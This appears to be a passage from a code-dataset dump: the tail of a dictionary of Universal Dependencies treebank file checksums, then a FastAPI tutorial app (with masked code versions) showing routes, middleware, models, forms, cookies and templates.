'32f4abc821624c4cd4d3b3b555c1558f06366e2c')},\n 'he': {'dev': ('he-ud-dev.conllu',\n 'c5b76874fcf11c7733e1555957bb49e8298af140'),\n 'test': ('he-ud-test.conllu',\n '4fbe4115948250fc2e42dd43399d1c6c11ddcfd2'),\n 'train': ('he-ud-train.conllu',\n 'eae49a515b38d224b109138bf006a112e80a7caf')},\n 'hi_pud': {'test': ('hi_pud-ud-test.conllu',\n 'd237fecc594186e7a52ad33313ac52e927905d73')},\n 'hi': {'dev': ('hi-ud-dev.conllu',\n '48b592bb1aa1cbc30d41d2913421cfd3f9d2c790'),\n 'test': ('hi-ud-test.conllu',\n '004a7fdde368f32f9f230bc5e2cf4ce9e1d8f8d7'),\n 'train': ('hi-ud-train.conllu',\n '9be8afb2cabda361817c55b3de6ebba2c3fef7e0')},\n 'hu': {'dev': ('hu-ud-dev.conllu',\n 'ec622e6bcf2a84b0b47eba0de01cf5768157a50e'),\n 'test': ('hu-ud-test.conllu',\n 'fd717d25add38c2fb2dc8e82e2f9e5b0b9f3c5b8'),\n 'train': ('hu-ud-train.conllu',\n 'e5486523a8bebe40d633ad8b4050be8a3d11c78a')},\n 'id': {'dev': ('id-ud-dev.conllu',\n '7b181aa954a4f4b22b80a18e4f67cbf423e9c701'),\n 'test': ('id-ud-test.conllu',\n '357ed8c216725760bf5be561ed6e918ce602b5ac'),\n 'train': ('id-ud-train.conllu',\n '328ea588b75de55ef48373c2bf9983bca277d724')},\n 'ga': {'dev': ('ga-ud-dev.conllu',\n '180a1a9dcfcec6528a559032c67e9a15693a039d'),\n 'test': ('ga-ud-test.conllu',\n 'b74a56372af3f68f089ea82ba858e5a82aae4e22'),\n 'train': ('ga-ud-train.conllu',\n '40df0b12fbadae6e56c0a01da483d6c612d9450c')},\n 'it_pud': {'test': ('it_pud-ud-test.conllu',\n 'c7121c03dbdc7d27f89c6f6dd8f046b89233438e')},\n 'it_partut': {'dev': ('it_partut-ud-dev.conllu',\n '0bb5dc0c0815212c9832eaef3b802cf885e0543b'),\n 'test': ('it_partut-ud-test.conllu',\n 'b5eccd3d9a94a2f96c8c3a6e4192a287ac563898'),\n 'train': ('it_partut-ud-train.conllu',\n '784b18bf8d3b59d967d147075a3cb5b03fb28637')},\n 'it_postwita': {'dev': ('it_postwita-ud-dev.conllu',\n '07f6f658246aa070e2166e688f7569d61aafff54'),\n 'test': ('it_postwita-ud-test.conllu',\n 'c2d58f50e51d37cb5f55bd0a3129138e95a72a8a'),\n 'train': ('it_postwita-ud-train.conllu',\n '69684c47fba99230f6ef1a204b95c37d28eaa5a6')},\n 'it': {'dev': ('it-ud-dev.conllu',\n 'ea8fd59f36280fbd77b9a807959491636048a698'),\n 'test': ('it-ud-test.conllu',\n '34839fdeeef883f8034c723a18772947106cec6b'),\n 'train': ('it-ud-train.conllu',\n 'a0cae413f46a344366f86bc7ffe4f5d7ecbf6a14')},\n 'ja_pud': {'test': ('ja_pud-ud-test.conllu',\n '4c914016a0968ca434348370d38c9579a60e8fd7')},\n 'ja': {'dev': ('ja-ud-dev.conllu',\n '21f06fef7fbeccd05a298385bf40f8b4ffe95146'),\n 'test': ('ja-ud-test.conllu',\n '240d3532698356a7c6f93c3215718ef2f66a672f'),\n 'train': ('ja-ud-train.conllu',\n '35eaf307d94c2006241fe08f745d7b1b17f049cf')},\n 'kk': {'dev': ('kk-ud-dev.conllu',\n '038033c822b407040a4ecb87c077506cd0d1a322'),\n 'test': ('kk-ud-test.conllu',\n '4124bcaa6e4fc132613d94a882abcff8ecad8ca0'),\n 'train': ('kk-ud-train.conllu',\n '48d664d273ad6731cb65228ce9b57ad3cf50f7f5')},\n 'ko': {'dev': ('ko-ud-dev.conllu',\n '60e7da7cca44c923873a062e80262726659f5528'),\n 'test': ('ko-ud-test.conllu',\n 'bc9a0fc4ddfed14b70bb58048bf8b8d50062cffd'),\n 'train': ('ko-ud-train.conllu',\n 'ee21328f9ea39668e802f0cb6a794358f5c256bf')},\n 'kmr': {'sample': ('kmr-ud-sample.conllu',\n 'd76d631400d17b63b9592ce3c0f4ecada012d6d0'),\n 'test': ('kmr-ud-test.conllu',\n '606a338db2d6adde6b4d7d8c9ee2bdf1f988d729')},\n 'la_ittb': {'dev': ('la_ittb-ud-dev.conllu',\n 'd9f17992bd0258a734aea9b6c53759039717c86a'),\n 'test': ('la_ittb-ud-test.conllu',\n 'f4d097d076083240c48594d4cb058840ff16be8e'),\n 'train': ('la_ittb-ud-train.conllu',\n '627d5b30b20655efab194c75fc9219b0aa2cf4b6')},\n 'la_proiel': {'dev': 
('la_proiel-ud-dev.conllu',\n '9a510ff1f29b507ce46d32c04eb8f02ec8bdb4fb'),\n 'test': ('la_proiel-ud-test.conllu',\n '697dbeae38507856a4fafa8506dfc8db5e8e4054'),\n 'train': ('la_proiel-ud-train.conllu',\n '5e57e0a83ed8dcdfcc892c2558249cb6bc02b37a')},\n 'la': {'dev': ('la-ud-dev.conllu',\n '2748bb0479cb599e1a007d1d1634d5870b45549b'),\n 'test': ('la-ud-test.conllu',\n '19c62c64ce41a650e9b55a345c61e7c0d994816e'),\n 'train': ('la-ud-train.conllu',\n '183ce6f58b0305e5926161e29b9a6aacc424662c')},\n 'lv': {'dev': ('lv-ud-dev.conllu',\n '6bf3843d92aeb5b4a5e3b457708ad0aca176fbd2'),\n 'test': ('lv-ud-test.conllu',\n '9f7806a24656db0e859efe041a88926b220b8e28'),\n 'train': ('lv-ud-train.conllu',\n 'f1eeff608e8f27d92b683ae041591355198841eb')},\n 'lt': {'dev': ('lt-ud-dev.conllu',\n '0b8dc19005571fa7b66d8302b797d51a241f128b'),\n 'test': ('lt-ud-test.conllu',\n 'def54d6caf97610eb4ca8c0179d661c8eab98951'),\n 'train': ('lt-ud-train.conllu',\n '13fe42a3d21f17a5cad5aaf38692619c7713e177')},\n 'mr': {'dev': ('mr-ud-dev.conllu',\n 'abf7ac90a3696bb979e6ddc17cbc0fc761040b1b'),\n 'test': ('mr-ud-test.conllu',\n 'b70e2a135e69dc17474951bfd9c7cf3f203d4798'),\n 'train': ('mr-ud-train.conllu',\n '24a1370184054a7f5af647997dca783d6c571242')},\n 'sme': {'sample': ('sme-ud-sample.conllu',\n '8c456f06b363c4d273fc454a49505f783f00fe43'),\n 'test': ('sme-ud-test.conllu',\n '6c2084f60d7f2d1468a0cb4f4a4b9669274b122e'),\n 'train': ('sme-ud-train.conllu',\n '203eab4183fd585efe3fea7e6df493a6746b0a9f')},\n 'no_bokmaal': {'dev': ('no_bokmaal-ud-dev.conllu',\n '3a1aa6646ee62c605a6e5a7b535434ce93d0581f'),\n 'test': ('no_bokmaal-ud-test.conllu',\n '18336ef0e4877ae28eb7d6019afe05b5a53245d5'),\n 'train': ('no_bokmaal-ud-train.conllu',\n 'c6a1d75956dfb9376e568bf241b3ee5ebf3be3a5')},\n 'no_nynorsk': {'dev': ('no_nynorsk-ud-dev.conllu',\n '5b95a070d11a61a23fc340ecbbbbb70f86884498'),\n 'test': ('no_nynorsk-ud-test.conllu',\n '3eaab8e4af82de2333521e9be0954ffaf6b1440b'),\n 'train': ('no_nynorsk-ud-train.conllu',\n '79319993097c30ddf28d4c1137b8662f4f35d17e')},\n 'no_nynorsklia': {'dev': ('no_nynorsklia-ud-dev.conllu',\n 'f3e3cc9b156784c12e7540b6e09a19963df8d7d9'),\n 'test': ('no_nynorsklia-ud-test.conllu',\n 'c43abf4ad0d9c1d844edb9ff0fdf8b00949c4a0b')},\n 'cu': {'dev': ('cu-ud-dev.conllu',\n '0b67035ed5ca52aeefae443611232ed202fb990a'),\n 'test': ('cu-ud-test.conllu',\n '0fed872a5a2480b601c67ebbecf8dcd680b6863b'),\n 'train': ('cu-ud-train.conllu',\n '1c58f7322b96aa65e2b6bbeb5cb5226b46dc3ef0')},\n 'fa': {'dev': ('fa-ud-dev.conllu',\n '098f97ff4c0a6a9dcaafe2c83908b1ff044b4446'),\n 'test': ('fa-ud-test.conllu',\n '0024aa6bad5eceed2e36f77d88578304a5886a80'),\n 'train': ('fa-ud-train.conllu',\n '1692f90f58fb1ed2faaa4e8c5d2d47a37c47082b')},\n 'pl': {'dev': ('pl-ud-dev.conllu',\n 'b7af7bee091feb0788eb9793a7102972006421dc'),\n 'test': ('pl-ud-test.conllu',\n 'e141e793ba35f8a08510ec1ce494099b5c800ca8'),\n 'train': ('pl-ud-train.conllu',\n 'f2227ba184a5030fc47b1aff732e04ae11b9ab94')},\n 'pt_br': {'dev': ('pt_br-ud-dev.conllu',\n '8eedc77096a87fe8ab251100d460780e161e5397'),\n 'test': ('pt_br-ud-test.conllu',\n '37a64e3acef107b62ab62ce478fc36ed112fb58f'),\n 'train': ('pt_br-ud-train.conllu',\n '023cafcb6959d52298ad619f7838f26db9798aa9')},\n 'pt_pud': {'test': ('pt_pud-ud-test.conllu',\n '4f7a98b59255ff58a1a423dda6f2cb7261dcea7d')},\n 'pt': {'dev': ('pt-ud-dev.conllu',\n '2171b4ac2b0726c9dfae6adf394b76be927accab'),\n 'test': ('pt-ud-test.conllu',\n '9e819a4592db42905806141d6fca3b7b20396ce3'),\n 'train': ('pt-ud-train.conllu',\n 
'b5fbb6598d5cc53a0f7e699adeb4a61948a49b5c')},\n 'ro_nonstandard': {'test': ('ro_nonstandard-ud-test.conllu',\n '300d53091412dc5700dc5cad0fd3e136f7c8cb11'),\n 'train': ('ro_nonstandard-ud-train.conllu',\n 'ed97f51129b63857627f838f68f41c9ef8541686')},\n 'ro': {'dev': ('ro-ud-dev.conllu',\n 'a320e29582e837fa48bbe0aab8e205cadfcb4a02'),\n 'test': ('ro-ud-test.conllu',\n '0cfe4806a28ebdc02dc7ea58635d8b550c3a9d7b'),\n 'train': ('ro-ud-train.conllu',\n '74beb2aa92d2fca50dbb1a4f716b936afb436ab9')},\n 'ru_pud': {'test': ('ru_pud-ud-test.conllu',\n 'bca81ce7aaf3cb8add98b19faecc1d8303901631')},\n 'ru_syntagrus': {'dev': ('ru_syntagrus-ud-dev.conllu',\n '304c6ec7fb5060583af5f890384e3a480f8c3ad5'),\n 'test': ('ru_syntagrus-ud-test.conllu',\n 'c138e39b48dc1c66d106e68ee75c6fce28ef780c'),\n 'train': ('ru_syntagrus-ud-train.conllu',\n '8fa56fa80845e4ad946189d1e7af228b5595e312')},\n 'ru': {'dev': ('ru-ud-dev.conllu',\n 'd3b11c0fd8a87bfb7ce9666a1888126ae5ddca90'),\n 'test': ('ru-ud-test.conllu',\n 'ae13bbf49e0d2fddae8ba2eeacd15a9a77c7bfff'),\n 'train': ('ru-ud-train.conllu',\n 'fd43e7323ad2e62a6924fc5b5d48e85c6ab5a430')},\n 'sa': {'test': ('sa-ud-test.conllu',\n 'fad3a03a6834884a092b1d326625c6f663e36636')},\n 'sr': {'dev': ('sr-ud-dev.conllu',\n 'dcb9a242986285e83512ddaa4b3ada07c4cea17a'),\n 'test': ('sr-ud-test.conllu',\n '0f0c9e394c440bb2dd514bdd6873d3ffef13821b'),\n 'train': ('sr-ud-train.conllu',\n '97ea9bfe4ac97011598fbb5ca20b5cbaf5093334')},\n 'sk': {'dev': ('sk-ud-dev.conllu',\n 'c84563c08922d60b0c765e9f9c22d9f6f2765ff9'),\n 'test': ('sk-ud-test.conllu',\n '89af4581c5f9058809f48788eb635a92cda0603c'),\n 'train': ('sk-ud-train.conllu',\n '89e108093bbf5619578955fdadfe200cefd8cf01')},\n 'sl_sst': {'dev': ('sl_sst-ud-dev.conllu',\n 'c65ae82123af95ec11f47262546b5ab2fc5735e5'),\n 'test': ('sl_sst-ud-test.conllu',\n '144a0124c1181b49d0c542a4a6d4465e45545f3b'),\n 'train': ('sl_sst-ud-train.conllu',\n '4cbb97d5c19cfb1d85cdd54a13e24de2343a4ac5')},\n 'sl': {'dev': ('sl-ud-dev.conllu',\n '0078572c19574d32defeae9924176da2dd701ede'),\n 'test': ('sl-ud-test.conllu',\n '616ace00e25df99be8dd49b7bf7c48f1093df96a'),\n 'train': ('sl-ud-train.conllu',\n '1462ac69163b30cf1399527e95f686ebf91be2d3')},\n 'es_ancora': {'dev': ('es_ancora-ud-dev.conllu',\n '94b00cc6449a1793b5ba1d9d5c1e4b34ad1cc7d5'),\n 'test': ('es_ancora-ud-test.conllu',\n '8d7dc8d8441e1ca4b54708a5382ed61b48bf7920'),\n 'train': ('es_ancora-ud-train.conllu',\n '95d5bf7ad33304f3440ffb014ac094c4967c303f')},\n 'es_pud': {'test': ('es_pud-ud-test.conllu',\n 'c2b17fce1da3bdd2a50d9dd7eca101db1d2907e0')},\n 'es': {'dev': ('es-ud-dev.conllu',\n '4cdb828c492c6b7707af0ab6c7fbf734f770630a'),\n 'test': ('es-ud-test.conllu',\n 'afd1ae1b7eb73a91456c30acf388eef4faf4785a'),\n 'train': ('es-ud-train.conllu',\n '5ce48b44ba1b3e748a40cb5bf893d3096518ecbc')},\n 'sv_lines': {'dev': ('sv_lines-ud-dev.conllu',\n '15f1a04d960518fe7bfee23ce227fc7b78d4b755'),\n 'test': ('sv_lines-ud-test.conllu',\n '843df4ea3ab4f551b1eaa661652a8d6489a81d41'),\n 'train': ('sv_lines-ud-train.conllu',\n '16e3533bf174b36d728847a36a3600f16c63baa6')},\n 'sv_pud': {'test': ('sv_pud-ud-test.conllu',\n '18dadac0c15468256b340835ebc0529facbe9b73')},\n 'sv': {'dev': ('sv-ud-dev.conllu',\n '6d14e1aae5c9ae37c35481c44c04bf74a4233455'),\n 'test': ('sv-ud-test.conllu',\n '7ead0f7b49508db0022c042195ac5925b611c5b7'),\n 'train': ('sv-ud-train.conllu',\n '68affb85efde6ed017eab1e998e9666108559e04')},\n 'swl': {'dev': ('swl-ud-dev.conllu',\n '828e0a08f12cabfa75f9dd2b53dba58606522a7c'),\n 'test': ('swl-ud-test.conllu',\n 
'674f76631cf16172d67b795ff92dfbb297eb4930'),\n 'train': ('swl-ud-train.conllu',\n '46b721f9cae2d5ba43f818dd487600b0ce76362a')},\n 'ta': {'dev': ('ta-ud-dev.conllu',\n '4d01f555012ddc1976933d4d928e26470f71bfa1'),\n 'test': ('ta-ud-test.conllu',\n 'e8db8816a98d8b7e81188786db7c405979a7e3c3'),\n 'train': ('ta-ud-train.conllu',\n '6753d8c7b1b016de39c087aab45056de6021c3ae')},\n 'te': {'dev': ('te-ud-dev.conllu',\n '29f46355d767e54e8565f76a063c43e95ead0fca'),\n 'test': ('te-ud-test.conllu',\n '50abe345d4ab5bae021cacd096266c57b00572b8'),\n 'train': ('te-ud-train.conllu',\n '1794469abe09e7364cda0d9764cf515dcb4a61b6')},\n 'tr_pud': {'test': ('tr_pud-ud-test.conllu',\n 'aae839e2476a2f149c98e0274d245d07a50dafaa')},\n 'tr': {'dev': ('tr-ud-dev.conllu',\n '421de4d8d0fbdda46750523bde72880414c134a3'),\n 'test': ('tr-ud-test.conllu',\n 'b175f136f6f0271c494a58a1846971c4a07cda27'),\n 'train': ('tr-ud-train.conllu',\n '5aeaf25fc9e00c75e377983a0d0a642e4df6ae7d')},\n 'uk': {'dev': ('uk-ud-dev.conllu',\n '0d3e3507edcd46a3eaa8c4702d0f5d84661a6d9d'),\n 'test': ('uk-ud-test.conllu',\n '46c88fd623894fabdafb01a826016c215e4f65cc'),\n 'train': ('uk-ud-train.conllu',\n 'd06e0e2fa67c35a20517738bd728ac3b26d8eafe')},\n 'hsb': {'sample': ('hsb-ud-sample.conllu',\n '148eddbb19b06115ea54e17a3fca58e99a85cbd9'),\n 'test': ('hsb-ud-test.conllu',\n '3d319288b4c06395b2627980737131995949f770')},\n 'ur': {'dev': ('ur-ud-dev.conllu',\n 'dc41e72b5adeb92f308cdc8dfcbf71f84b4a5cf9'),\n 'test': ('ur-ud-test.conllu',\n 'af5da25be4c4ec1f2a222bc462b39ca4bbcc0eb0'),\n 'train': ('ur-ud-train.conllu',\n '488d65b394d0de264be1221614c09e541f92f9de')},\n 'ug': {'dev': ('ug-ud-dev.conllu',\n 'a2e6cd7ef51ffd7c83de7c62fbad998f1020f857'),\n 'test': ('ug-ud-test.conllu',\n '4877323d8dbfaa8ab862f0aa8e5484fdadb9ef43')},\n 'vi': {'dev': ('vi-ud-dev.conllu',\n '1c733d3ea3e4cce00cb0aa4d599bcb3b0a6096a8'),\n 'test': ('vi-ud-test.conllu',\n '1bb822e58f21aa5ccac15fe6c6742a42e8389d41'),\n 'train': ('vi-ud-train.conllu',\n 'ac86132afc061625740abd524c5cdf3d35ebbbc4')}}\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from fastapi import FastAPI, Header, Cookie, Form, Request, requests, Body, Response, HTTPException, status, Path, Query
from fastapi.responses import HTMLResponse
from typing import Optional
from fastapi.testclient import TestClient
from typing import List, Callable
from fastapi.staticfiles import StaticFiles
from fastapi.templating import Jinja2Templates
from fastapi.exceptions import RequestValidationError
from fastapi.routing import APIRoute
from starlette.responses import JSONResponse
from pydantic import BaseModel
import uvicorn
import time
payloads = {
'peoples': [
{
'firstname': 'watcharapon',
'lastname': 'weeraborirak',
'age': '24',
'city': 'bangkok'
},
{
'firstname': 'somsak',
'lastname': 'tamjai',
'age': '22',
'city': 'bangkok'
},
{
'firstname': 'rakkana',
'lastname': 'meejai',
'age': '66',
'city': 'outcast'
},
]
}
class Item(BaseModel):
name: str
price: float
class ValidationError(APIRoute):
def get_route_handler(self) -> Callable:
original_route_handler = super().get_route_handler()
async def customer_route_handler(request: Request) -> Response:
try:
return await original_route_handler(request)
except RequestValidationError as exc:
body = await request.body()
detail = {'error': exc.errors(), 'body': body.decode()}
raise HTTPException(status_code=200, detail=detail)
return customer_route_handler
app = FastAPI()
app.router.route_class = ValidationError
app.mount('/static', StaticFiles(directory='static'), name='static')
templates = Jinja2Templates(directory='templates')
client = TestClient(app)
@app.middleware('http')
async def add_process_time_header(request: Request, call_next):
start_time = time.time()
response = await call_next(request)
process_time = time.time() - start_time
response.headers['X-Process-Time'] = '{}'.format(str(round(process_time, 4)))
return response
@app.middleware('http')
async def add_process_name(request: Request, call_next):
response = await call_next(request)
response.headers['X-Owner-Server'] = 'Kane'
return response
@app.post('/items')
async def base_model(item: Item):
item_dict = item.dict()
return {'message': item_dict}
@app.put('/items/{item_id}')
async def item_id(item_id: int, item: Item):
return {'item_id': item_id, **item.dict()}
@app.get("/items_id/{item_id}")
async def read_items(
item_id: int = Path(..., title="The ID of the item to get"),
q: Optional[str] = Query(None, alias="item-query")
):
results = {"item_id": item_id}
if q:
results.update({"q": q})
return results
@app.get('/peoples')
async def fetch_movies(query: str = None): # query param string
payload = [p[query] for p in payloads['peoples']]
return payload
@app.get('/member')
async def member(item: Item, X_Item_ID: str = Header(...)): # Header
print(X_Item_ID)
if X_Item_ID != 'member':
raise HTTPException(status_code=400, detail="X-Item-ID header invalid")
return JSONResponse(content={item.name: 'kane', item.price: 123.33})
@app.get('/member/token')
async def member_token(x_token: str = Cookie(None)):
print(x_token)
return {'message': f'success cookie {x_token}'}
@app.get('/api_body/{item_id}') # dynamic route
async def api_body(item_id: str):
return {'item_id': item_id}
@app.post('/payload_request', response_model=Item, status_code=status.HTTP_201_CREATED)
async def payload_request(item: Item):
return item
@app.post("/payload_json")
async def create_item(payload: dict = Body(...)):
print(payload)
return payload
@app.post('/form_data')
async def form_data(password: str = Form(...), username: str = Form(...)):
return {'message': {'user': username, 'pwd': password}}
@app.post('/cookies')
async def cookies(response: Response):
response.set_cookie(key='foo', value='value')
return {'message': 'cookies darken'}
@app.get('/')
@app.get('/index', tags=['dashboard'])
async def index(request: Request):
return templates.TemplateResponse('template_fastapi/login.vue', context={'request': request})
@app.get("/func_element", response_model=Item, tags=["Description"], deprecated=True)
async def func_element(item: Item):
"""
Get Data Element:
- **name**: my_name
- **price**: price
"""
return item
@app.post("/func_item", response_model=Item, tags=["Description"], summary="Create an item",
description="Create an item with all the , name, description, price, tax and a set of unique tags")
async def fuc_item(item: Item):
update_item = item.dict()
update_item['name'] = 'kane_ja'
return update_item
@app.post('/json_response', response_model=Item, tags=['Description'])
async def json_response(item: Item):
"""
Return JsonResponse
- **Item**: name
- **status**: 201
"""
return JSONResponse(content={item.name: 'kaneeang'}, status_code=201)
if __name__ == '__main__':
uvicorn.run('fastapi_route_config:app', debug=True, port=8080)
|
normal
|
{
"blob_id": "70188d011ef60b1586864c4b85a9f9e70e5a4caf",
"index": 7386,
"step-1": "<mask token>\n\n\nclass Item(BaseModel):\n name: str\n price: float\n\n\nclass ValidationError(APIRoute):\n\n def get_route_handler(self) ->Callable:\n original_route_handler = super().get_route_handler()\n\n async def customer_route_handler(request: Request) ->Response:\n try:\n return await original_route_handler(request)\n except RequestValidationError as exc:\n body = await request.body()\n detail = {'error': exc.errors(), 'body': body.decode()}\n raise HTTPException(status_code=200, detail=detail)\n return customer_route_handler\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Item(BaseModel):\n name: str\n price: float\n\n\nclass ValidationError(APIRoute):\n\n def get_route_handler(self) ->Callable:\n original_route_handler = super().get_route_handler()\n\n async def customer_route_handler(request: Request) ->Response:\n try:\n return await original_route_handler(request)\n except RequestValidationError as exc:\n body = await request.body()\n detail = {'error': exc.errors(), 'body': body.decode()}\n raise HTTPException(status_code=200, detail=detail)\n return customer_route_handler\n\n\n<mask token>\napp.mount('/static', StaticFiles(directory='static'), name='static')\n<mask token>\n\n\n@app.middleware('http')\nasync def add_process_time_header(request: Request, call_next):\n start_time = time.time()\n response = await call_next(request)\n process_time = time.time() - start_time\n response.headers['X-Process-Time'] = '{}'.format(str(round(process_time,\n 4)))\n return response\n\n\n@app.middleware('http')\nasync def add_process_name(request: Request, call_next):\n response = await call_next(request)\n response.headers['X-Owner-Server'] = 'Kane'\n return response\n\n\n@app.post('/items')\nasync def base_model(item: Item):\n item_dict = item.dict()\n return {'message': item_dict}\n\n\n@app.put('/items/{item_id}')\nasync def item_id(item_id: int, item: Item):\n return {'item_id': item_id, **item.dict()}\n\n\n@app.get('/items_id/{item_id}')\nasync def read_items(item_id: int=Path(..., title=\n 'The ID of the item to get'), q: Optional[str]=Query(None, alias=\n 'item-query')):\n results = {'item_id': item_id}\n if q:\n results.update({'q': q})\n return results\n\n\n@app.get('/peoples')\nasync def fetch_movies(query: str=None):\n payload = [p[query] for p in payloads['peoples']]\n return payload\n\n\n@app.get('/member')\nasync def member(item: Item, X_Item_ID: str=Header(...)):\n print(X_Item_ID)\n if X_Item_ID != 'member':\n raise HTTPException(status_code=400, detail='X-Item-ID header invalid')\n return JSONResponse(content={item.name: 'kane', item.price: 123.33})\n\n\n@app.get('/member/token')\nasync def member_token(x_token: str=Cookie(None)):\n print(x_token)\n return {'message': f'success cookie {x_token}'}\n\n\n@app.get('/api_body/{item_id}')\nasync def api_body(item_id: str):\n return {'item_id': item_id}\n\n\n@app.post('/payload_request', response_model=Item, status_code=status.\n HTTP_201_CREATED)\nasync def payload_request(item: Item):\n return item\n\n\n@app.post('/payload_json')\nasync def create_item(payload: dict=Body(...)):\n print(payload)\n return payload\n\n\n@app.post('/form_data')\nasync def form_data(password: str=Form(...), username: str=Form(...)):\n return {'message': {'user': username, 'pwd': password}}\n\n\n@app.post('/cookies')\nasync def cookies(response: Response):\n response.set_cookie(key='foo', value='value')\n return {'message': 'cookies darken'}\n\n\n@app.get('/')\n@app.get('/index', tags=['dashboard'])\nasync def index(request: Request):\n return templates.TemplateResponse('template_fastapi/login.vue', context\n ={'request': request})\n\n\n@app.get('/func_element', response_model=Item, tags=['Description'],\n deprecated=True)\nasync def func_element(item: Item):\n \"\"\"\n Get Data Element:\n - **name**: my_name\n - **price**: price\n \"\"\"\n return item\n\n\n@app.post('/func_item', response_model=Item, tags=['Description'], summary=\n 'Create an item', description=\n 'Create an item with all the , name, description, price, tax and a set of unique tags'\n )\nasync def fuc_item(item: Item):\n 
update_item = item.dict()\n update_item['name'] = 'kane_ja'\n return update_item\n\n\n@app.post('/json_response', response_model=Item, tags=['Description'])\nasync def json_response(item: Item):\n \"\"\"\n Return JsonResponse\n - **Item**: name\n - **status**: 201\n \"\"\"\n return JSONResponse(content={item.name: 'kaneeang'}, status_code=201)\n\n\nif __name__ == '__main__':\n uvicorn.run('fastapi_route_config:app', debug=True, port=8080)\n",
"step-3": "<mask token>\npayloads = {'peoples': [{'firstname': 'watcharapon', 'lastname':\n 'weeraborirak', 'age': '24', 'city': 'bangkok'}, {'firstname': 'somsak',\n 'lastname': 'tamjai', 'age': '22', 'city': 'bangkok'}, {'firstname':\n 'rakkana', 'lastname': 'meejai', 'age': '66', 'city': 'outcast'}]}\n\n\nclass Item(BaseModel):\n name: str\n price: float\n\n\nclass ValidationError(APIRoute):\n\n def get_route_handler(self) ->Callable:\n original_route_handler = super().get_route_handler()\n\n async def customer_route_handler(request: Request) ->Response:\n try:\n return await original_route_handler(request)\n except RequestValidationError as exc:\n body = await request.body()\n detail = {'error': exc.errors(), 'body': body.decode()}\n raise HTTPException(status_code=200, detail=detail)\n return customer_route_handler\n\n\napp = FastAPI()\napp.router.route_class = ValidationError\napp.mount('/static', StaticFiles(directory='static'), name='static')\ntemplates = Jinja2Templates(directory='templates')\nclient = TestClient(app)\n\n\n@app.middleware('http')\nasync def add_process_time_header(request: Request, call_next):\n start_time = time.time()\n response = await call_next(request)\n process_time = time.time() - start_time\n response.headers['X-Process-Time'] = '{}'.format(str(round(process_time,\n 4)))\n return response\n\n\n@app.middleware('http')\nasync def add_process_name(request: Request, call_next):\n response = await call_next(request)\n response.headers['X-Owner-Server'] = 'Kane'\n return response\n\n\n@app.post('/items')\nasync def base_model(item: Item):\n item_dict = item.dict()\n return {'message': item_dict}\n\n\n@app.put('/items/{item_id}')\nasync def item_id(item_id: int, item: Item):\n return {'item_id': item_id, **item.dict()}\n\n\n@app.get('/items_id/{item_id}')\nasync def read_items(item_id: int=Path(..., title=\n 'The ID of the item to get'), q: Optional[str]=Query(None, alias=\n 'item-query')):\n results = {'item_id': item_id}\n if q:\n results.update({'q': q})\n return results\n\n\n@app.get('/peoples')\nasync def fetch_movies(query: str=None):\n payload = [p[query] for p in payloads['peoples']]\n return payload\n\n\n@app.get('/member')\nasync def member(item: Item, X_Item_ID: str=Header(...)):\n print(X_Item_ID)\n if X_Item_ID != 'member':\n raise HTTPException(status_code=400, detail='X-Item-ID header invalid')\n return JSONResponse(content={item.name: 'kane', item.price: 123.33})\n\n\n@app.get('/member/token')\nasync def member_token(x_token: str=Cookie(None)):\n print(x_token)\n return {'message': f'success cookie {x_token}'}\n\n\n@app.get('/api_body/{item_id}')\nasync def api_body(item_id: str):\n return {'item_id': item_id}\n\n\n@app.post('/payload_request', response_model=Item, status_code=status.\n HTTP_201_CREATED)\nasync def payload_request(item: Item):\n return item\n\n\n@app.post('/payload_json')\nasync def create_item(payload: dict=Body(...)):\n print(payload)\n return payload\n\n\n@app.post('/form_data')\nasync def form_data(password: str=Form(...), username: str=Form(...)):\n return {'message': {'user': username, 'pwd': password}}\n\n\n@app.post('/cookies')\nasync def cookies(response: Response):\n response.set_cookie(key='foo', value='value')\n return {'message': 'cookies darken'}\n\n\n@app.get('/')\n@app.get('/index', tags=['dashboard'])\nasync def index(request: Request):\n return templates.TemplateResponse('template_fastapi/login.vue', context\n ={'request': request})\n\n\n@app.get('/func_element', response_model=Item, tags=['Description'],\n 
deprecated=True)\nasync def func_element(item: Item):\n \"\"\"\n Get Data Element:\n - **name**: my_name\n - **price**: price\n \"\"\"\n return item\n\n\n@app.post('/func_item', response_model=Item, tags=['Description'], summary=\n 'Create an item', description=\n 'Create an item with all the , name, description, price, tax and a set of unique tags'\n )\nasync def fuc_item(item: Item):\n update_item = item.dict()\n update_item['name'] = 'kane_ja'\n return update_item\n\n\n@app.post('/json_response', response_model=Item, tags=['Description'])\nasync def json_response(item: Item):\n \"\"\"\n Return JsonResponse\n - **Item**: name\n - **status**: 201\n \"\"\"\n return JSONResponse(content={item.name: 'kaneeang'}, status_code=201)\n\n\nif __name__ == '__main__':\n uvicorn.run('fastapi_route_config:app', debug=True, port=8080)\n",
"step-4": "from fastapi import FastAPI, Header, Cookie, Form, Request, requests, Body, Response, HTTPException, status, Path, Query\nfrom fastapi.responses import HTMLResponse\nfrom typing import Optional\nfrom fastapi.testclient import TestClient\nfrom typing import List, Callable\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.exceptions import RequestValidationError\nfrom fastapi.routing import APIRoute\nfrom starlette.responses import JSONResponse\nfrom pydantic import BaseModel\nimport uvicorn\nimport time\npayloads = {'peoples': [{'firstname': 'watcharapon', 'lastname':\n 'weeraborirak', 'age': '24', 'city': 'bangkok'}, {'firstname': 'somsak',\n 'lastname': 'tamjai', 'age': '22', 'city': 'bangkok'}, {'firstname':\n 'rakkana', 'lastname': 'meejai', 'age': '66', 'city': 'outcast'}]}\n\n\nclass Item(BaseModel):\n name: str\n price: float\n\n\nclass ValidationError(APIRoute):\n\n def get_route_handler(self) ->Callable:\n original_route_handler = super().get_route_handler()\n\n async def customer_route_handler(request: Request) ->Response:\n try:\n return await original_route_handler(request)\n except RequestValidationError as exc:\n body = await request.body()\n detail = {'error': exc.errors(), 'body': body.decode()}\n raise HTTPException(status_code=200, detail=detail)\n return customer_route_handler\n\n\napp = FastAPI()\napp.router.route_class = ValidationError\napp.mount('/static', StaticFiles(directory='static'), name='static')\ntemplates = Jinja2Templates(directory='templates')\nclient = TestClient(app)\n\n\n@app.middleware('http')\nasync def add_process_time_header(request: Request, call_next):\n start_time = time.time()\n response = await call_next(request)\n process_time = time.time() - start_time\n response.headers['X-Process-Time'] = '{}'.format(str(round(process_time,\n 4)))\n return response\n\n\n@app.middleware('http')\nasync def 